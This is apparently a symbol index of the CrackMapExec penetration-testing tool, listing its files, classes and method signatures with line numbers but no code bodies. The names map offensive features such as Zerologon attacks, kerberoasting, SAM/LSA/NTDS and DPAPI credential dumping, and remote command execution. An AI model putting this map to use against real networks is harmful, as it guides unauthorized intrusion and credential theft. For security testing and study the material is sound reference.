function get_list_from_option (line 57) | def get_list_from_option(opt):
class SMBSpiderPlus (line 65) | class SMBSpiderPlus:
method __init__ (line 66) | def __init__(
method reconnect (line 108) | def reconnect(self):
method list_path (line 124) | def list_path(self, share, subfolder):
method get_remote_file (line 146) | def get_remote_file(self, share, path):
method read_chunk (line 157) | def read_chunk(self, remote_file, chunk_size=CHUNK_SIZE):
method get_file_save_path (line 185) | def get_file_save_path(self, remote_file):
method spider_shares (line 203) | def spider_shares(self):
method spider_folder (line 255) | def spider_folder(self, share_name, folder):
method parse_file (line 288) | def parse_file(self, share_name, file_path, file_info):
method save_file (line 366) | def save_file(self, remote_file, share_name):
method dump_folder_metadata (line 398) | def dump_folder_metadata(self, results):
method print_stats (line 411) | def print_stats(self):
class CMEModule (line 500) | class CMEModule:
method options (line 513) | def options(self, context, module_options):
method on_login (line 536) | def on_login(self, context, connection):
FILE: cme/modules/spooler.py
class CMEModule (line 20) | class CMEModule:
method __init__ (line 32) | def __init__(self, context=None, module_options=None):
method options (line 38) | def options(self, context, module_options):
method on_login (line 46) | def on_login(self, context, connection):
method __fetch_list (line 126) | def __fetch_list(self, rpctransport):
FILE: cme/modules/subnets.py
function searchResEntry_to_dict (line 7) | def searchResEntry_to_dict(results):
class CMEModule (line 16) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_login (line 48) | def on_login(self, context, connection):
FILE: cme/modules/teams_localdb.py
class CMEModule (line 7) | class CMEModule:
method options (line 14) | def options(self, context, module_options):
method on_admin_login (line 17) | def on_admin_login(self, context, connection):
method parse_file (line 42) | def parse_file(context, name):
FILE: cme/modules/test_connection.py
class CMEModule (line 7) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_admin_login (line 31) | def on_admin_login(self, context, connection):
FILE: cme/modules/trust.py
class CMEModule (line 4) | class CMEModule:
method options (line 15) | def options(self, context, module_options):
method on_login (line 18) | def on_login(self, context, connection):
FILE: cme/modules/uac.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 16) | def __init__(self, context=None, module_options=None):
method options (line 21) | def options(self, context, module_options):
method on_admin_login (line 24) | def on_admin_login(self, context, connection):
FILE: cme/modules/user_desc.py
class CMEModule (line 10) | class CMEModule:
method __init__ (line 23) | def __init__(self, context=None, multiple_options=None):
method options (line 31) | def options(self, context, module_options):
method on_login (line 72) | def on_login(self, context, connection):
method create_log_file (line 94) | def create_log_file(self, host, time):
method delete_log_file (line 105) | def delete_log_file(self):
method append_to_log (line 116) | def append_to_log(self, user, description):
method process_record (line 123) | def process_record(self, item):
method highlight (line 159) | def highlight(self, description):
FILE: cme/modules/veeam_dump.py
class CMEModule (line 14) | class CMEModule:
method __init__ (line 25) | def __init__(self):
method options (line 31) | def options(self, context, module_options):
method checkVeeamInstalled (line 37) | def checkVeeamInstalled(self, context, connection):
method stripXmlOutput (line 127) | def stripXmlOutput(self, context, output):
method executePsMssql (line 130) | def executePsMssql(self, context, connection, SqlDatabase, SqlInstance...
method executePsPostgreSql (line 138) | def executePsPostgreSql(self, context, connection, PostgreSqlExec, Pos...
method printCreds (line 146) | def printCreds(self, context, output):
method on_admin_login (line 169) | def on_admin_login(self, context, connection):
FILE: cme/modules/wcc.py
class ConfigCheck (line 46) | class ConfigCheck:
method __init__ (line 53) | def __init__(self, name, description="", checkers=[None], checker_args...
method run (line 64) | def run(self):
method log (line 73) | def log(self, context):
class CMEModule (line 87) | class CMEModule:
method options (line 99) | def options(self, context, module_options):
method on_admin_login (line 115) | def on_admin_login(self, context, connection):
method on_shutdown (line 120) | def on_shutdown(self, context, connection):
method add_result (line 124) | def add_result(self, host, result):
method export_results (line 132) | def export_results(self):
class HostChecker (line 148) | class HostChecker:
method __init__ (line 151) | def __init__(self, context, connection):
method run (line 158) | def run(self):
method init_checks (line 168) | def init_checks(self):
method check_config (line 335) | def check_config(self):
method check_registry (line 356) | def check_registry(self, *specs, options={}):
method check_laps (line 440) | def check_laps(self):
method check_last_successful_update (line 504) | def check_last_successful_update(self):
method check_administrator_name (line 519) | def check_administrator_name(self):
method check_guest_account_disabled (line 526) | def check_guest_account_disabled(self):
method check_spooler_service (line 533) | def check_spooler_service(self):
method check_wsus_running (line 549) | def check_wsus_running(self):
method check_nbtns (line 559) | def check_nbtns(self):
method check_applocker (line 583) | def check_applocker(self):
method _open_root_key (line 599) | def _open_root_key(self, dce, connection, root_key):
method reg_get_subkeys (line 624) | def reg_get_subkeys(self, dce, connection, key_name):
method reg_query_value (line 653) | def reg_query_value(self, dce, connection, keyName, valueName=None):
method get_service (line 728) | def get_service(self, service_name, connection):
method get_user_info (line 744) | def get_user_info(self, connection, rid=501):
method ls (line 768) | def ls(self, smb, path='\\', share='C$'):
function le (line 782) | def le(reg_sz_string, number):
function in_ (line 785) | def in_(obj, seq):
function startswith (line 788) | def startswith(string, start):
function not_ (line 791) | def not_(boolean_operator):
FILE: cme/modules/wdigest.py
class CMEModule (line 9) | class CMEModule:
method options (line 17) | def options(self, context, module_options):
method on_admin_login (line 32) | def on_admin_login(self, context, connection):
method wdigest_enable (line 40) | def wdigest_enable(self, context, smbconnection):
method wdigest_disable (line 73) | def wdigest_disable(self, context, smbconnection):
method wdigest_check (line 119) | def wdigest_check(self, context, smbconnection):
FILE: cme/modules/web_delivery.py
class CMEModule (line 7) | class CMEModule:
method options (line 21) | def options(self, context, module_options):
method on_admin_login (line 40) | def on_admin_login(self, context, connection):
FILE: cme/modules/webdav.py
class CMEModule (line 10) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
FILE: cme/modules/whoami.py
class CMEModule (line 1) | class CMEModule:
method options (line 13) | def options(self, context, module_options):
method on_login (line 21) | def on_login(self, context, connection):
FILE: cme/modules/winscp_dump.py
class CMEModule (line 20) | class CMEModule:
method options (line 31) | def options(self, context, module_options):
method printCreds (line 52) | def printCreds(self, context, session):
method userObjectToNameMapper (line 61) | def userObjectToNameMapper(self, context, connection, allUserObjects):
method decryptPasswd (line 84) | def decryptPasswd(self, host: str, username: str, password: str) -> str:
method dec_next_char (line 114) | def dec_next_char(self, passBytes) -> "Tuple[int, bytes]":
method registrySessionExtractor (line 130) | def registrySessionExtractor(self, context, connection, userObject, se...
method findAllLoggedInUsersInRegistry (line 171) | def findAllLoggedInUsersInRegistry(self, context, connection):
method findAllUsers (line 208) | def findAllUsers(self, context, connection):
method loadMissingUsers (line 243) | def loadMissingUsers(self, context, connection, unloadedUserObjects):
method unloadMissingUsers (line 284) | def unloadMissingUsers(self, context, connection, unloadedUserObjects):
method checkMasterpasswordSet (line 310) | def checkMasterpasswordSet(self, connection, userObject):
method registryDiscover (line 331) | def registryDiscover(self, context, connection):
method decodeConfigFile (line 396) | def decodeConfigFile(self, context, confFile):
method getConfigFile (line 417) | def getConfigFile(self, context, connection):
method on_admin_login (line 457) | def on_admin_login(self, context, connection):
FILE: cme/modules/wireless.py
class CMEModule (line 12) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_admin_login (line 22) | def on_admin_login(self, context, connection):
FILE: cme/modules/zerologon.py
class CMEModule (line 15) | class CMEModule:
method __init__ (line 22) | def __init__(self, context=None, module_options=None):
method options (line 26) | def options(self, context, module_options):
method on_login (line 29) | def on_login(self, context, connection):
method perform_attack (line 48) | def perform_attack(self, dc_handle, dc_ip, target_computer):
function fail (line 66) | def fail(msg):
function try_zero_authenticate (line 71) | def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer):
FILE: cme/parsers/ip.py
function parse_targets (line 7) | def parse_targets(target):
FILE: cme/parsers/nessus.py
function parse_nessus_file (line 16) | def parse_nessus_file(nessus_file, protocol):
FILE: cme/parsers/nmap.py
function parse_nmap_xml (line 44) | def parse_nmap_xml(nmap_output_file, protocol):
FILE: cme/protocols/ftp.py
class ftp (line 9) | class ftp(connection):
method __init__ (line 10) | def __init__(self, args, db, host):
method proto_logger (line 16) | def proto_logger(self):
method proto_flow (line 26) | def proto_flow(self):
method enum_host_info (line 34) | def enum_host_info(self):
method print_host_info (line 41) | def print_host_info(self):
method create_conn_obj (line 45) | def create_conn_obj(self):
method plaintext_login (line 61) | def plaintext_login(self, username, password):
method list_directory_full (line 100) | def list_directory_full(self):
method supported_commands (line 107) | def supported_commands(self):
FILE: cme/protocols/ftp/database.py
class database (line 16) | class database:
method __init__ (line 17) | def __init__(self, db_engine):
method db_schema (line 33) | def db_schema(db_conn):
method reflect_tables (line 60) | def reflect_tables(self):
method shutdown_db (line 85) | def shutdown_db(self):
method clear_database (line 94) | def clear_database(self):
method add_host (line 98) | def add_host(self, host, port, banner):
method add_credential (line 149) | def add_credential(self, username, password):
method remove_credentials (line 201) | def remove_credentials(self, creds_id):
method is_credential_valid (line 211) | def is_credential_valid(self, credential_id):
method get_credential (line 222) | def get_credential(self, username, password):
method get_credentials (line 233) | def get_credentials(self, filter_term=None):
method is_host_valid (line 251) | def is_host_valid(self, host_id):
method get_hosts (line 259) | def get_hosts(self, filter_term=None):
method is_user_valid (line 279) | def is_user_valid(self, cred_id):
method get_user (line 287) | def get_user(self, username):
method get_users (line 292) | def get_users(self, filter_term=None):
method add_loggedin_relation (line 304) | def add_loggedin_relation(self, cred_id, host_id):
method get_loggedin_relations (line 329) | def get_loggedin_relations(self, cred_id=None, host_id=None):
method remove_loggedin_relations (line 338) | def remove_loggedin_relations(self, cred_id=None, host_id=None):
method add_directory_listing (line 346) | def add_directory_listing(self, lir_id, data):
method get_directory_listing (line 349) | def get_directory_listing(self):
method remove_directory_listing (line 352) | def remove_directory_listing(self):
FILE: cme/protocols/ftp/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method display_creds (line 8) | def display_creds(self, creds):
method display_hosts (line 26) | def display_hosts(self, hosts):
method do_hosts (line 46) | def do_hosts(self, line):
method help_hosts (line 91) | def help_hosts(self):
method do_creds (line 100) | def do_creds(self, line):
method help_creds (line 156) | def help_creds(self):
method do_clear_database (line 173) | def do_clear_database(self, line):
method help_clear_database (line 178) | def help_clear_database(self):
FILE: cme/protocols/ftp/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/ldap.py
function resolve_collection_methods (line 60) | def resolve_collection_methods(methods):
class ldap (line 132) | class ldap(connection):
method __init__ (line 133) | def __init__(self, args, db, host):
method proto_logger (line 155) | def proto_logger(self):
method get_ldap_info (line 166) | def get_ldap_info(self, host):
method get_os_arch (line 215) | def get_os_arch(self):
method get_ldap_username (line 241) | def get_ldap_username(self):
method enum_host_info (line 255) | def enum_host_info(self):
method print_host_info (line 299) | def print_host_info(self):
method kerberos_login (line 316) | def kerberos_login(
method plaintext_login (line 472) | def plaintext_login(self, domain, username, password):
method hash_login (line 547) | def hash_login(self, domain, username, ntlm_hash):
method create_smbv1_conn (line 636) | def create_smbv1_conn(self):
method create_smbv3_conn (line 652) | def create_smbv3_conn(self):
method create_conn_obj (line 667) | def create_conn_obj(self):
method get_sid (line 677) | def get_sid(self):
method sid_to_str (line 680) | def sid_to_str(self, sid):
method check_if_admin (line 700) | def check_if_admin(self):
method getUnixTime (line 735) | def getUnixTime(self, t):
method search (line 740) | def search(self, searchFilter, attributes, sizeLimit=0):
method users (line 765) | def users(self):
method groups (line 803) | def groups(self):
method dc_list (line 827) | def dc_list(self):
method asreproast (line 851) | def asreproast(self):
method kerberoasting (line 925) | def kerberoasting(self):
method trusted_for_delegation (line 1048) | def trusted_for_delegation(self):
method password_not_required (line 1113) | def password_not_required(self):
method admin_count (line 1195) | def admin_count(self):
method gmsa (line 1259) | def gmsa(self):
method decipher_gmsa_name (line 1295) | def decipher_gmsa_name(self, domain_name=None, account_name=None):
method gmsa_convert_id (line 1309) | def gmsa_convert_id(self):
method gmsa_decrypt_lsa (line 1339) | def gmsa_decrypt_lsa(self):
method bloodhound (line 1379) | def bloodhound(self):
FILE: cme/protocols/ldap/bloodhound.py
class BloodHound (line 10) | class BloodHound(object):
method __init__ (line 11) | def __init__(self, ad, hostname, host, port):
method proto_logger (line 20) | def proto_logger(self, port, hostname, host):
method connect (line 23) | def connect(self):
method run (line 48) | def run(
FILE: cme/protocols/ldap/database.py
class database (line 15) | class database:
method __init__ (line 16) | def __init__(self, db_engine):
method db_schema (line 32) | def db_schema(db_conn):
method reflect_tables (line 50) | def reflect_tables(self):
method shutdown_db (line 65) | def shutdown_db(self):
method clear_database (line 74) | def clear_database(self):
FILE: cme/protocols/ldap/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/ldap/gmsa.py
class MSDS_MANAGEDPASSWORD_BLOB (line 4) | class MSDS_MANAGEDPASSWORD_BLOB(Structure):
method __init__ (line 20) | def __init__(self, data=None):
method fromString (line 23) | def fromString(self, data):
FILE: cme/protocols/ldap/kerberos.py
class KerberosAttacks (line 29) | class KerberosAttacks:
method __init__ (line 30) | def __init__(self, connection):
method outputTGS (line 51) | def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=...
method getTGT_kerberoasting (line 109) | def getTGT_kerberoasting(self):
method getTGT_asroast (line 177) | def getTGT_asroast(self, userName, requestPAC=True):
FILE: cme/protocols/ldap/laps.py
class LDAPConnect (line 32) | class LDAPConnect:
method __init__ (line 33) | def __init__(self, host, port, hostname):
method proto_logger (line 37) | def proto_logger(self, host, port, hostname):
method kerberos_login (line 40) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method auth_login (line 121) | def auth_login(self, domain, username, password, ntlm_hash):
class LAPSv2Extract (line 179) | class LAPSv2Extract:
method __init__ (line 180) | def __init__(self, data, username, password, domain, ntlm_hash, do_ker...
method proto_logger (line 196) | def proto_logger(self, host, port, hostname):
method run (line 199) | def run(self):
FILE: cme/protocols/ldap/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 39) | def get_conditional_action(baseAction):
FILE: cme/protocols/mssql.py
class mssql (line 30) | class mssql(connection):
method __init__ (line 31) | def __init__(self, args, db, host):
method proto_flow (line 41) | def proto_flow(self):
method proto_logger (line 52) | def proto_logger(self):
method enum_host_info (line 62) | def enum_host_info(self):
method print_host_info (line 113) | def print_host_info(self):
method create_conn_obj (line 122) | def create_conn_obj(self):
method check_if_admin (line 131) | def check_if_admin(self):
method kerberos_login (line 146) | def kerberos_login(
method plaintext_login (line 216) | def plaintext_login(self, domain, username, password):
method hash_login (line 255) | def hash_login(self, domain, username, ntlm_hash):
method mssql_query (line 305) | def mssql_query(self):
method execute (line 331) | def execute(self, payload=None, print_output=False):
method ps_execute (line 359) | def ps_execute(
method put_file (line 377) | def put_file(self):
method get_file (line 393) | def get_file(self):
method handle_mssql_reply (line 409) | def handle_mssql_reply(self):
FILE: cme/protocols/mssql/database.py
class database (line 21) | class database:
method __init__ (line 22) | def __init__(self, db_engine):
method db_schema (line 39) | def db_schema(db_conn):
method reflect_tables (line 73) | def reflect_tables(self):
method shutdown_db (line 89) | def shutdown_db(self):
method clear_database (line 98) | def clear_database(self):
method add_host (line 102) | def add_host(self, ip, hostname, domain, os, instances):
method add_credential (line 150) | def add_credential(self, credtype, domain, username, password, pillage...
method remove_credentials (line 196) | def remove_credentials(self, creds_id):
method add_admin_user (line 206) | def add_admin_user(self, credtype, domain, username, password, host, u...
method get_admin_relations (line 241) | def get_admin_relations(self, user_id=None, host_id=None):
method remove_admin_relation (line 252) | def remove_admin_relation(self, user_ids=None, host_ids=None):
method is_credential_valid (line 262) | def is_credential_valid(self, credential_id):
method get_credentials (line 273) | def get_credentials(self, filter_term=None, cred_type=None):
method is_host_valid (line 293) | def is_host_valid(self, host_id):
method get_hosts (line 301) | def get_hosts(self, filter_term=None, domain=None):
FILE: cme/protocols/mssql/db_navigator.py
class navigator (line 8) | class navigator(DatabaseNavigator):
method display_creds (line 9) | def display_creds(self, creds):
method display_hosts (line 26) | def display_hosts(self, hosts):
method do_hosts (line 43) | def do_hosts(self, line):
method do_creds (line 76) | def do_creds(self, line):
method do_clear_database (line 132) | def do_clear_database(self, line):
method help_clear_database (line 137) | def help_clear_database():
method complete_hosts (line 145) | def complete_hosts(self, text, line):
method complete_creds (line 154) | def complete_creds(self, text, line):
FILE: cme/protocols/mssql/mssqlexec.py
class MSSQLEXEC (line 8) | class MSSQLEXEC:
method __init__ (line 9) | def __init__(self, connection):
method execute (line 13) | def execute(self, command, output=False):
method enable_xp_cmdshell (line 46) | def enable_xp_cmdshell(self):
method disable_xp_cmdshell (line 49) | def disable_xp_cmdshell(self):
method enable_ole (line 52) | def enable_ole(self):
method disable_ole (line 55) | def disable_ole(self):
method put_file (line 58) | def put_file(self, data, remote):
method file_exists (line 67) | def file_exists(self, remote):
method get_file (line 74) | def get_file(self, remote, local):
FILE: cme/protocols/mssql/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 32) | def get_conditional_action(baseAction):
FILE: cme/protocols/rdp.py
class rdp (line 28) | class rdp(connection):
method __init__ (line 29) | def __init__(self, args, db, host):
method proto_logger (line 96) | def proto_logger(self):
method print_host_info (line 106) | def print_host_info(self):
method create_conn_obj (line 114) | def create_conn_obj(self):
method check_nla (line 165) | def check_nla(self):
method connect_rdp (line 181) | async def connect_rdp(self):
method kerberos_login (line 186) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method plaintext_login (line 287) | def plaintext_login(self, domain, username, password):
method hash_login (line 319) | def hash_login(self, domain, username, ntlm_hash):
method screen (line 352) | async def screen(self):
method screenshot (line 366) | def screenshot(self):
method nla_screen (line 369) | async def nla_screen(self):
method nla_screenshot (line 383) | def nla_screenshot(self):
FILE: cme/protocols/rdp/database.py
class database (line 15) | class database:
method __init__ (line 16) | def __init__(self, db_engine):
method db_schema (line 32) | def db_schema(db_conn):
method reflect_tables (line 52) | def reflect_tables(self):
method shutdown_db (line 67) | def shutdown_db(self):
method clear_database (line 76) | def clear_database(self):
FILE: cme/protocols/rdp/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/rdp/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/smb.py
function get_error_string (line 89) | def get_error_string(exception):
function requires_smb_server (line 103) | def requires_smb_server(func):
class smb (line 154) | class smb(connection):
method __init__ (line 155) | def __init__(self, args, db, host):
method proto_logger (line 175) | def proto_logger(self):
method get_os_arch (line 185) | def get_os_arch(self):
method enum_host_info (line 211) | def enum_host_info(self):
method laps_search (line 265) | def laps_search(self, username, password, ntlm_hash, domain):
method print_host_info (line 364) | def print_host_info(self):
method kerberos_login (line 372) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method plaintext_login (line 457) | def plaintext_login(self, domain, username, password):
method hash_login (line 517) | def hash_login(self, domain, username, ntlm_hash):
method create_smbv1_conn (line 583) | def create_smbv1_conn(self, kdc=""):
method create_smbv3_conn (line 604) | def create_smbv3_conn(self, kdc=""):
method create_conn_obj (line 627) | def create_conn_obj(self, kdc=""):
method check_if_admin (line 634) | def check_if_admin(self):
method gen_relay_list (line 656) | def gen_relay_list(self):
method execute (line 665) | def execute(self, payload=None, get_output=False, methods=None):
method ps_execute (line 797) | def ps_execute(
method shares (line 842) | def shares(self):
method get_dc_ips (line 921) | def get_dc_ips(self):
method sessions (line 929) | def sessions(self):
method disks (line 947) | def disks(self):
method local_groups (line 970) | def local_groups(self):
method domainfromdsn (line 1043) | def domainfromdsn(self, dsn):
method domainfromdnshostname (line 1055) | def domainfromdnshostname(self, dns):
method groups (line 1060) | def groups(self):
method users (line 1155) | def users(self):
method hosts (line 1160) | def hosts(self):
method loggedon_users (line 1186) | def loggedon_users(self):
method pass_pol (line 1209) | def pass_pol(self):
method wmi (line 1213) | def wmi(self, wmi_query=None, namespace=None):
method spider (line 1270) | def spider(
method rid_brute (line 1303) | def rid_brute(self, max_rid=None):
method put_file (line 1407) | def put_file(self):
method get_file (line 1416) | def get_file(self):
method enable_remoteops (line 1432) | def enable_remoteops(self):
method sam (line 1443) | def sam(self):
method dpapi (line 1488) | def dpapi(self):
method lsa (line 1699) | def lsa(self):
method ntds (line 1745) | def ntds(self):
FILE: cme/protocols/smb/atexec.py
class TSCH_EXEC (line 12) | class TSCH_EXEC:
method __init__ (line 13) | def __init__(
method execute (line 68) | def execute(self, command, output=False):
method output_callback (line 73) | def output_callback(self, data):
method gen_xml (line 76) | def gen_xml(self, command, tmpFileName, fileless=False):
method execute_handler (line 136) | def execute_handler(self, command, fileless=False):
FILE: cme/protocols/smb/database.py
class database (line 24) | class database:
method __init__ (line 25) | def __init__(self, db_engine):
method db_schema (line 50) | def db_schema(db_conn):
method reflect_tables (line 179) | def reflect_tables(self):
method shutdown_db (line 203) | def shutdown_db(self):
method clear_database (line 212) | def clear_database(self):
method add_host (line 217) | def add_host(
method add_credential (line 296) | def add_credential(self, credtype, domain, username, password, group_i...
method remove_credentials (line 362) | def remove_credentials(self, creds_id):
method add_admin_user (line 372) | def add_admin_user(self, credtype, domain, username, password, host, u...
method get_admin_relations (line 407) | def get_admin_relations(self, user_id=None, host_id=None):
method remove_admin_relation (line 418) | def remove_admin_relation(self, user_ids=None, host_ids=None):
method is_credential_valid (line 428) | def is_credential_valid(self, credential_id):
method get_credentials (line 439) | def get_credentials(self, filter_term=None, cred_type=None):
method get_credential (line 459) | def get_credential(self, cred_type, domain, username, password):
method is_credential_local (line 470) | def is_credential_local(self, credential_id):
method is_host_valid (line 480) | def is_host_valid(self, host_id):
method get_hosts (line 488) | def get_hosts(self, filter_term=None, domain=None):
method is_group_valid (line 526) | def is_group_valid(self, group_id):
method add_group (line 538) | def add_group(self, domain, name, rid=None, member_count_ad=None):
method get_groups (line 605) | def get_groups(self, filter_term=None, group_name=None, group_domain=N...
method get_group_relations (line 631) | def get_group_relations(self, user_id=None, group_id=None):
method remove_group_relations (line 645) | def remove_group_relations(self, user_id=None, group_id=None):
method is_user_valid (line 653) | def is_user_valid(self, user_id):
method get_users (line 661) | def get_users(self, filter_term=None):
method get_user (line 673) | def get_user(self, domain, username):
method get_domain_controllers (line 681) | def get_domain_controllers(self, domain=None):
method is_share_valid (line 684) | def is_share_valid(self, share_id):
method add_share (line 694) | def add_share(self, host_id, user_id, name, remark, read, write):
method get_shares (line 709) | def get_shares(self, filter_term=None):
method get_shares_by_access (line 720) | def get_shares_by_access(self, permissions, share_id=None):
method get_users_with_share_access (line 732) | def get_users_with_share_access(self, host_id, share_name, permissions):
method add_domain_backupkey (line 743) | def add_domain_backupkey(self, domain: str, pvk: bytes):
method get_domain_backupkey (line 765) | def get_domain_backupkey(self, domain: str = None):
method is_dpapi_secret_valid (line 781) | def is_dpapi_secret_valid(self, dpapi_secret_id):
method add_dpapi_secrets (line 792) | def add_dpapi_secrets(
method get_dpapi_secrets (line 821) | def get_dpapi_secrets(
method add_loggedin_relation (line 860) | def add_loggedin_relation(self, user_id, host_id):
method get_loggedin_relations (line 882) | def get_loggedin_relations(self, user_id=None, host_id=None):
method remove_loggedin_relations (line 891) | def remove_loggedin_relations(self, user_id=None, host_id=None):
method get_checks (line 899) | def get_checks(self):
method get_check_results (line 903) | def get_check_results(self):
method insert_data (line 907) | def insert_data(self, table, select_results=[], **new_row):
method add_check (line 939) | def add_check(self, name, description):
method add_check_result (line 953) | def add_check_result(self, host_id, check_id, secure, reasons):
FILE: cme/protocols/smb/db_navigator.py
class navigator (line 12) | class navigator(DatabaseNavigator):
method display_creds (line 13) | def display_creds(self, creds):
method display_groups (line 37) | def display_groups(self, groups):
method display_hosts (line 62) | def display_hosts(self, hosts):
method display_shares (line 122) | def display_shares(self, shares):
method do_shares (line 145) | def do_shares(self, line):
method help_shares (line 199) | def help_shares(self):
method do_groups (line 207) | def do_groups(self, line):
method help_groups (line 266) | def help_groups(self):
method do_hosts (line 274) | def do_hosts(self, line):
method do_wcc (line 363) | def do_wcc(self, line):
method display_wcc_results (line 384) | def display_wcc_results(self, results, columns_to_display=None):
method help_wcc (line 424) | def help_wcc(self):
method help_hosts (line 441) | def help_hosts(self):
method do_dpapi (line 460) | def do_dpapi(self, line):
method help_dpapi (line 594) | def help_dpapi(self):
method do_creds (line 611) | def do_creds(self, line):
method help_creds (line 696) | def help_creds(self):
method do_clear_database (line 716) | def do_clear_database(self, line):
method help_clear_database (line 720) | def help_clear_database(self):
method complete_hosts (line 728) | def complete_hosts(self, text, line):
method complete_creds (line 738) | def complete_creds(self, text, line):
FILE: cme/protocols/smb/firefox.py
class FirefoxData (line 17) | class FirefoxData:
method __init__ (line 18) | def __init__(self, winuser: str, url: str, username: str, password: str):
class FirefoxTriage (line 25) | class FirefoxTriage:
method __init__ (line 44) | def __init__(self, target, logger, conn: DPLootSMBConnection = None):
method upgrade_connection (line 49) | def upgrade_connection(self, connection=None):
method run (line 56) | def run(self):
method get_login_data (line 111) | def get_login_data(self, logins_data):
method get_key (line 125) | def get_key(self, key4_data, master_password=b""):
method is_master_password_correct (line 156) | def is_master_password_correct(self, key_data, master_password=b""):
method get_users (line 170) | def get_users(self):
method decode_login_data (line 182) | def decode_login_data(data):
method decrypt (line 191) | def decrypt(key, iv, ciphertext):
method decrypt_3des (line 204) | def decrypt_3des(decoded_item, master_password, global_salt):
FILE: cme/protocols/smb/mmcexec.py
class MMCEXEC (line 62) | class MMCEXEC:
method __init__ (line 63) | def __init__(self, host, share_name, username, password, domain, smbco...
method getInterface (line 139) | def getInterface(self, interface, resp):
method execute (line 166) | def execute(self, command, output=False):
method exit (line 173) | def exit(self):
method execute_remote (line 186) | def execute_remote(self, data):
method output_callback (line 228) | def output_callback(self, data):
method get_output_fileless (line 231) | def get_output_fileless(self):
method get_output_remote (line 243) | def get_output_remote(self):
FILE: cme/protocols/smb/passpol.py
function d2b (line 11) | def d2b(a):
function convert (line 24) | def convert(low, high, lockout=False):
class PassPolDump (line 67) | class PassPolDump:
method __init__ (line 73) | def __init__(self, connection):
method dump (line 97) | def dump(self):
method fetchList (line 129) | def fetchList(self, rpctransport):
method pretty_print (line 219) | def pretty_print(self):
FILE: cme/protocols/smb/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/smb/remotefile.py
class RemoteFile (line 6) | class RemoteFile:
method __init__ (line 7) | def __init__(
method open (line 22) | def open(self):
method seek (line 25) | def seek(self, offset, whence):
method read (line 30) | def read(self, bytesToRead):
method close (line 37) | def close(self):
method delete (line 42) | def delete(self):
method tell (line 45) | def tell(self):
method __str__ (line 48) | def __str__(self):
FILE: cme/protocols/smb/samrfunc.py
class SamrFunc (line 17) | class SamrFunc:
method __init__ (line 18) | def __init__(self, connection):
method get_builtin_groups (line 60) | def get_builtin_groups(self):
method get_custom_groups (line 72) | def get_custom_groups(self):
method get_local_groups (line 83) | def get_local_groups(self):
method get_local_users (line 88) | def get_local_users(self):
method get_local_administrators (line 91) | def get_local_administrators(self):
class SAMRQuery (line 104) | class SAMRQuery:
method __init__ (line 105) | def __init__(
method get_transport (line 129) | def get_transport(self):
method get_dce (line 147) | def get_dce(self):
method get_server_handle (line 161) | def get_server_handle(self):
method get_domains (line 173) | def get_domains(self):
method get_domain_handle (line 181) | def get_domain_handle(self, domain_name):
method get_domain_aliases (line 186) | def get_domain_aliases(self, domain_handle):
method get_alias_handle (line 193) | def get_alias_handle(self, domain_handle, alias_id):
method get_alias_members (line 197) | def get_alias_members(self, domain_handle, alias_id):
class LSAQuery (line 206) | class LSAQuery:
method __init__ (line 207) | def __init__(
method get_transport (line 233) | def get_transport(self):
method get_dce (line 252) | def get_dce(self):
method get_policy_handle (line 265) | def get_policy_handle(self):
method lookup_sids (line 269) | def lookup_sids(self, sids):
FILE: cme/protocols/smb/samruser.py
class UserSamrDump (line 11) | class UserSamrDump:
method __init__ (line 17) | def __init__(self, connection):
method dump (line 41) | def dump(self):
method fetchList (line 69) | def fetchList(self, rpctransport):
FILE: cme/protocols/smb/smbexec.py
class SMBEXEC (line 12) | class SMBEXEC:
method __init__ (line 13) | def __init__(
method execute (line 98) | def execute(self, command, output=False):
method output_callback (line 109) | def output_callback(self, data):
method execute_remote (line 112) | def execute_remote(self, data):
method get_output_remote (line 161) | def get_output_remote(self):
method execute_fileless (line 189) | def execute_fileless(self, data):
method get_output_fileless (line 228) | def get_output_fileless(self):
method finish (line 240) | def finish(self):
FILE: cme/protocols/smb/smbspider.py
class SMBSpider (line 12) | class SMBSpider:
method __init__ (line 13) | def __init__(self, smbconnection, logger):
method spider (line 25) | def spider(
method _spider (line 71) | def _spider(self, subfolder, depth):
method dir_list (line 116) | def dir_list(self, files, path):
method search_content (line 160) | def search_content(self, path, result):
method get_lastm_time (line 226) | def get_lastm_time(self, result_obj):
FILE: cme/protocols/smb/wmiexec.py
class WMIEXEC (line 15) | class WMIEXEC:
method __init__ (line 16) | def __init__(
method execute (line 92) | def execute(self, command, output=False):
method cd (line 105) | def cd(self, s):
method output_callback (line 115) | def output_callback(self, data):
method execute_handler (line 118) | def execute_handler(self, data):
method execute_remote (line 126) | def execute_remote(self, data):
method execute_fileless (line 137) | def execute_fileless(self, data):
method get_output_fileless (line 147) | def get_output_fileless(self):
method get_output_remote (line 156) | def get_output_remote(self):
FILE: cme/protocols/ssh.py
class ssh (line 19) | class ssh(connection):
method __init__ (line 20) | def __init__(self, args, db, host):
method proto_logger (line 26) | def proto_logger(self):
method print_host_info (line 37) | def print_host_info(self):
method enum_host_info (line 41) | def enum_host_info(self):
method create_conn_obj (line 51) | def create_conn_obj(self):
method client_close (line 66) | def client_close(self):
